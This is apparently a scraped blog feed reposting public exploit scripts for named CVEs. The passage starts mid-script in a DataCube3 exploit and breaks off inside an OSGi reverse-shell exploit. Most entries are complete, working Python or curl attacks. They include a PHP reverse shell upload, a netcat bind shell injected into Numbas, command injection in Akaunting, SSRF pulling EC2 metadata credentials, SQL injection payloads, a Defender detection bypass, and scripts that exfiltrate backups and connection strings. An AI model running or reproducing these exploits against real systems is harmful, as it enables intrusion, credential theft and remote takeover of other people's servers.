try: response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m') exit() authCookie = response.cookies.get_dict() print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie)) return authCookie except: print('[ERROR] Can\'t grab the auth cookie, is the root password correct?') def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie): print('[INFO] Extracting Accesstime ...') url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') accessTime = soup.find('input', {'name': 'accesstime'}).get('value') print('[INFO] AccessTime value: {}'.format(accessTime)) return accessTime except: print('[ERROR] Can\'t grab the accesstime value, is the root password correct?') def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime): print('[INFO] Injecting PHP reverse shell script ...') filename='rvs.php' payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT) data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime) headers = { 'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396' } url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m') exit() shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename) print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL)) return shellURL except: print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?') def execReverseShell(shellURL): print('[INFO] Executing reverse shell...') try: response = requests.get(shellURL, allow_redirects=False, verify=False) print('[INFO] Reverse shell successfully executed.') return except Exception as e: print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}') return False def main(): banner() args = parser.parse_args() protocol = 'https' if args.RPORT == 443 else 'http' rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol) authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword) accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie) shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime) execReverseShell(shellURL) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False) parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True) parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True) parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True) parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True) main()
  10. HireHackking

    Numbas < v7.3 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Numbas < v7.3 - Remote Code Execution # Google Dork: N/A # Date: March 7th, 2024 # Exploit Author: Matheus Boschetti # Vendor Homepage: https://www.numbas.org.uk/ # Software Link: https://github.com/numbas/Numbas # Version: 7.2 and below # Tested on: Linux # CVE: CVE-2024-27612 import sys, requests, re, argparse, subprocess, time from bs4 import BeautifulSoup s = requests.session() def getCSRF(target): url = f"http://{target}/" req = s.get(url) soup = BeautifulSoup(req.text, 'html.parser') csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] return csrfmiddlewaretoken def createTheme(target): # Format request csrfmiddlewaretoken = getCSRF(target) theme = 'ExampleTheme' boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1' data = ( f'--{boundary}\r\n' 'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n' '\r\n' f'{csrfmiddlewaretoken}\r\n' f'--{boundary}\r\n' 'Content-Disposition: form-data; name="name"\r\n' '\r\n' f'{theme}\r\n' f'--{boundary}--\r\n' ) headers = {'Content-Type': f'multipart/form-data; boundary={boundary}', 'User-Agent': 'Mozilla/5.0', 'Accept': '*/*', 'Connection': 'close'} # Create theme and return its ID req = s.post(f"http://{target}/theme/new/", headers=headers, data=data) redir = req.url split = redir.split('/') id = split[4] print(f"\t[i] Theme created with ID {id}") return id def login(target, user, passwd): print("\n[i] Attempting to login...") csrfmiddlewaretoken = getCSRF(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'username': user, 'password': passwd, 'next': '/'} # Login login = s.post(f"http://{target}/login/", data=data, allow_redirects=True) res = login.text if("Logged in as" not in res): print("\n\n[!] Login failed!") sys.exit(-1) # Check if logged and fetch ID usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res) if usermatch: user = usermatch.group(1) idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res) if idmatch: id = idmatch.group(1) print(f"\t[+] Logged in as \"{user}\" with ID {id}") def checkVuln(url): print("[i] Checking if target is vulnerable...") # Attempt to read files themeID = createTheme(url) target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.." hname = s.get(f"{target}/etc/hostname") ver = s.get(f"{target}/etc/issue") hnamesoup = BeautifulSoup(hname.text, 'html.parser') versoup = BeautifulSoup(ver.text, 'html.parser') hostname = hnamesoup.find('textarea').get_text().strip() version = versoup.find('textarea').get_text().strip() if len(hostname) < 1: print("\n\n[!] Something went wrong - target might not be vulnerable.") sys.exit(-1) print(f"\n[+] Target \"{hostname}\" is vulnerable!") print(f"\t[i] Running: \"{version}\"") # Cleanup - delete theme print(f"\t\t[i] Cleanup: deleting theme {themeID}...") target = f"http://{url}/themes/{themeID}/delete" csrfmiddlewaretoken = getCSRF(url) data = {'csrfmiddlewaretoken':csrfmiddlewaretoken} s.post(target, data=data) def replaceInit(target): # Overwrite __init__.py with arbitrary code rport = '8443' payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])" csrfmiddlewaretoken = getCSRF(target) filename = '../../../../numbas_editor/numbas/__init__.py' themeID = createTheme(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'source': payload, 'filename': filename} print("[i] Delivering payload...") # Retry 5 times in case something goes wrong... for attempt in range(5): try: s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10) except Exception as e: pass # Establish connection to bind shell time.sleep(2) print(f"\t[+] Payload delivered, establishing connection...\n") if ":" in target: split = target.split(":") ip = split[0] else: ip = str(target) subprocess.Popen(["nc", "-n", ip, rport]) while True: pass def main(): parser = argparse.ArgumentParser() if len(sys.argv) <= 1: print("\n[!] No option provided!") print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n") print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty") sys.exit(-1) group = parser.add_mutually_exclusive_group(required=True) group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit') parser.add_argument('--target', help='Target IP:PORT') parser.add_argument('--user', help='Username to authenticate') parser.add_argument('--passwd', help='Password to authenticate') args = parser.parse_args() action = args.action target = args.target user = args.user passwd = args.passwd print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-") if action == 'check': login(target, user, passwd) checkVuln(target) elif action == 'exploit': login(target, user, passwd) replaceInit(target) else: sys.exit(-1) if __name__ == "__main__": main()
  11. HireHackking

    Akaunting < 3.1.3 - RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Akaunting < 3.1.3 - RCE # Date: 08/02/2024 # Exploit Author: u32i@proton.me # Vendor Homepage: https://akaunting.com # Software Link: https://github.com/akaunting/akaunting # Version: <= 3.1.3 # Tested on: Ubuntu (22.04) # CVE : CVE-2024-22836 #!/usr/bin/python3 import sys import re import requests import argparse def get_company(): # print("[INF] Retrieving company id...") res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False) if res.status_code != 302: print("[ERR] No company id was found!") sys.exit(3) cid = res.headers['Location'].split('/')[-1] if cid == "login": print("[ERR] Invalid session cookie!") sys.exit(7) return cid def get_tokens(url): res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False) search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text) if not search_res: print("[ERR] Couldn't get csrf token") sys.exit(1) data = {} data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '') data['session'] = res.cookies.get('akaunting_session') return data def inject_command(cmd): url = f"{target}/{company_id}/wizard/companies" tokens = get_tokens(url) headers.update({"X-Csrf-Token": tokens['csrf_token']}) data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"} res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: print("[ERR] Command injection failed!") sys.exit(4) print("[INF] Command injected!") def trigger_rce(app, version = "1.0.0"): print("[INF] Executing the command...") url = f"{target}/{company_id}/apps/install" data = {"alias": app, "version": version, "path": f"apps/{app}/download"} headers.update({"Content-Type":"application/json"}) res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: search_res = re.search(r">Exit Code\:.*<", res_data['message']) if search_res: print("[ERR] Failed to execute the command") sys.exit(6) print("[ERR] Failed to install the app! no command was executed!") sys.exit(5) print("[INF] Executed successfully!") def login(email, password): url = f"{target}/auth/login" tokens = get_tokens(url) cookies.update({ 'akaunting_session': tokens['session'] }) data = { "_token": tokens['csrf_token'], "_method": "POST", "email": email, "password": password } req = requests.post(url, headers=headers, cookies=cookies, data=data) res = req.json() if res['error']: print("[ERR] Failed to log in!") sys.exit(8) print("[INF] Logged in") cookies.update({'akaunting_session': req.cookies.get('akaunting_session')}) def main(): inject_command(args.command) trigger_rce(args.alias, args.version) if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="target url") parser.add_argument("--email", help="user login email.") parser.add_argument("--password", help="user login password.") parser.add_argument("-i", "--id", type=int, help="company id (optional).") parser.add_argument("-c", "--command", help="command to execute.") parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard") parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2") args = parser.parse_args() headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"} cookies = {} target = args.url try: login(args.email, args.password) company_id = get_company() if not args.id else args.id main() except: sys.exit(0)
  12. HireHackking

    Ladder v0.0.21 - Server-side request forgery (SSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF) # Date: 2024-01-20 # Exploit Author: @_chebuya # Software Link: https://github.com/everywall/ladder # Version: v0.0.1 - v0.0.21 # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0) # CVE: CVE-2024-27620 # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs import requests import json target_url = "http://127.0.0.1:8080/api/" imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" r = requests.get(target_url + imdsv1_url) response_json = json.loads(r.text) print(response_json["body"])
  13. HireHackking

    Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass

    HireHackking posted a blog entry in Hacker Technology
    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing. [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt [Exploit/POC] Open command prompt as Administator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) Access is denied. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) Multi-commas, for the Win! [Network Access] Local [Severity] High [Disclosure Timeline] February 7, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  14. HireHackking

    Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 # # Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE: CVE-2023-5808 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from datetime import datetime from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-5808 PoC", usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=str, help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" ) # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="JSESSIONID cookie value" ) # Create --sso argument: parser.add_argument( "--sso", required=True, type=str, help="JSESSIONIDSSO cookie value" ) args = parser.parse_args() def download_file(hostname, jsessionid, jsessionidsso): # Set the filename: filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip" # Vulnerable SMU URL: smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/" # GET request cookies smu_cookies = { "JSESSIONID": jsessionid, "JSESSIONIDSSO": jsessionidsso } # GET request headers: smu_headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Dnt": "1", "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close" } # Send the request: with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: with open(filename, 'wb') as backup_archive: # Write the zip file to the CWD: backup_archive.write(file_download.content) print(f"{filename} has been downloaded to {getcwd()}") if __name__ == "__main__": download_file(args.host, args.id, args.sso)
  15. HireHackking

    Hide My WP < 6.2.9 - Unauthenticated SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
  16. HireHackking

    Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier - Arbitrary File Read

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 # Google Dork: [not] # Date: [12/28/2023] # Exploit Author: [Youssef Muhammad] # Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] # Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier] # Tested on: [Windows, Linux] # CVE : [CVE-2023-26360] import sys import requests import json BANNER = """ ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ """ RED_COLOR = "\033[91m" GREEN_COLOR = "\032[42m" RESET_COLOR = "\033[0m" def print_banner(): print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR) return 0 def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None): if not endpoint.endswith('.cfc'): endpoint += '.cfc' if target_file.endswith('.cfc'): raise ValueError('The TARGET_FILE must not point to a .cfc') targeted_file = f"a/{target_file}" json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []}) vars_get = {'method': 'test', '_cfclient': 'true'} uri = f'{host}{endpoint}' response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None) file_data = None splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>' if response.status_code in [404, 500] and splatter in response.text: file_data = response.text.split(splatter, 1)[0] if file_data is None: raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.') print(file_data) # Save the output to a file output_file_name = 'output.txt' with open(output_file_name, 'w') as output_file: output_file.write(file_data) print(f"The output saved to {output_file_name}") if __name__ == "__main__": if not 3 <= len(sys.argv) <= 5: print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]") sys.exit(1) print_banner() host = sys.argv[1] target_file = sys.argv[2] endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc" proxy_url = sys.argv[4] if len(sys.argv) > 4 else None try: run_exploit(host, target_file, endpoint, proxy_url) except Exception as e: print(f"Error: {e}")
  17. HireHackking

    WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:("plugins/duplicator/") # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ # CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A severe vulnerability has been discovered in the directory */wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential *brute force attacks on password hashes and, subsequently, the compromise of the entire system*.* POC*: 1) It is necessary that either the administrator or auto-backup works automatically at the scheduled time 2) Exploit will send file search requests every 5 seconds 3) I attack the site with this vulnerability using an exploit Exploit sends a request to the server every 5 seconds along the path “*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/ <http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if it finds something in the index of, it instantly parses all the data and displays it on the screen Exploit (python3): import requests from bs4 import BeautifulSoup import re import time url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/" processed_files = set() def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return [] def get_file_content(url, file_name): file_url = url + file_name if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return None while True: file_names = get_file_names(url) if file_names: print("File names on the page:") for file_name in file_names: if file_name not in processed_files: print(file_name) file_content = get_file_content(url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) time.sleep(5) -- With best regards, Dmitrii Ignatyev, Penetration Tester
  18. HireHackking

    Sitecore - Remote Code Execution v8.2

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # # Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2024-01-08 # Vendor Homepage: https://www.sitecore.com/ # Software Link: https://dev.sitecore.net/ # Version: 10.3 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 # Video POC : https://youtu.be/vWKl9wgdTB0 import argparse import requests from urllib.parse import quote from rich.console import Console console = Console() def initial_test(hostname): # Initial payload to test vulnerability test_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='TestVulnerability' /> ''' encoded_payload = quote(test_payload) url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data, verify=False) # Check for the test string in the Content-Type of the response return 'TestVulnerability' in response.headers.get('Content-Type', '') def get_payload(choice): # Payload templates for different options payloads = { '1': "<%$ ConnectionStrings:core %>", '2': "<%$ ConnectionStrings:master %>", '3': "<%$ ConnectionStrings:web %>" } base_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='{}' /> ''' return base_payload.format(payloads.get(choice, "Invalid")) def main(hostname): if initial_test(hostname): print("Exploiting, Please wait...") console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]") print("Select the payload to use:") print("1: Core connection strings") print("2: Master connection strings") print("3: Web connection strings") payload_choice = input("Enter your choice (1, 2, or 3): ") payload = get_payload(payload_choice) encoded_payload = quote(payload) url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data) if 'Content-Type' in response.headers: print("Content-Type from the response header:") print("\n") print(response.headers['Content-Type']) else: print("No Content-Type in the response header. Status Code:", response.status_code) else: print("The target does not appear to be vulnerable to CVE-2023-35813.") if __name__ == "__main__": console.print("[bold green]Author: Abhishek Morla[/bold green]") console.print("[bold red]CVE-2023-35813[/bold red]") parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore') parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance') args = parser.parse_args() main(args.hostname)
  19. HireHackking

    Human Resource Management System 1.0 - 'employeeid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Human Resource Management System - SQL Injection # Date: 13-01-2024 # Exploit Author: Srikar ( Exp1o1t9r ) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 # Vulnerable URL and Parameter:URL: Parameter: employeeid=2 The following payloads successfully identified SQL injection vulnerabilities: employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT 6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT 7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION ALL SELECT NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - * # Response:MySQL: 10.4.32-MariaDB Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*
  20. HireHackking

    OSGi v3.8-3.18 Console - RCE

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # Exploit Title: [OSGi v3.8-3.18 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.8 - 3.18] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ # --lport=4444 """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.8-3.18 and earlier. """ import argparse import socket import sys import threading from functools import partial from http.server import BaseHTTPRequestHandler, HTTPServer # Stage 1 of the handshake message HANDSHAKE_STAGE_1 = \ b"\xff\xfd\x01\xff\xfd" \ b"\x03\xff\xfb\x1f\xff" \ b"\xfa\x1f\x00\x74\x00" \ b"\x37\xff\xf0\xff\xfb" \ b"\x18" # Stage 2 of the handshake message HANDSHAKE_STAGE_2 = \ b"\xff\xfa\x18\x00\x58" \ b"\x54\x45\x52\x4d\x2d" \ b"\x32\x35\x36\x43\x4f" \ b"\x4c\x4f\x52\xff\xf0" # The buffer of this size is enough to handle the telnet handshake BUFFER_SIZE = 2 * 1024 class HandlerClass(BaseHTTPRequestHandler): """ This class overrides the BaseHTTPRequestHandler. It provides a specific functionality used to deliver a payload to the target host. """ _lhost: str _lport: int def __init__(self, lhost, lport, *args, **kwargs): self._lhost = lhost self._lport = lport super().__init__(*args, **kwargs) def _set_response(self): self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() def do_GET(self): # pylint: disable=C0103 """ This method is responsible for the playload delivery. """ print("Delivering the payload...") self._set_response() self.wfile.write(generate_revshell_payload( self._lhost, self._lport).encode('utf-8')) raise KeyboardInterrupt def log_message(self, format, *args): # pylint: disable=W0622 """ This method redefines a built-in method to suppress BaseHTTPRequestHandler log messages. """ return def generate_revshell_payload(lhost, lport): """ This function generates the Revershe Shell payload that will be executed on the target host. """ payload = \ "import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;" \ "class RevShell {public static void main(String[] args) " \ "throws Exception { String host=\"%s\";int 